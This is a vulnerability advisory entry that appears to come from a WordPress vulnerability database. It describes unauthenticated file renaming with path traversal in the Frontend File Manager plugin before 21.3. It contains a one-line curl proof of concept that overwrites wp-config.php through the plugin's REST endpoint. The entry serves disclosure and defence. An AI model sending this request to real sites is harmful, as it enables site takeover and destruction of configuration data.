WordPress Plugin Vulnerabilities
Frontend File Manager < 21.3 - Unauthenticated File Renaming
Description
The plugin allows any unauthenticated user to rename uploaded files from users. Furthermore, due to the lack of validation in the destination filename, this could allow allow them to change the content of arbitrary files on the web server
Proof of Concept
curl -i -s -k -X 'POST' --data-binary 'fileid=45&filename=../../../wp-config.php' 'https://example.com/wp-json/wpfm/v1/file-rename' This will replace the wp-config.php file with the content of the uploaded file with ID 45
Affects Plugins
References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-09-07 (about 1 years ago)
Added
2022-09-07 (about 1 years ago)
Last Updated
2022-09-07 (about 1 years ago)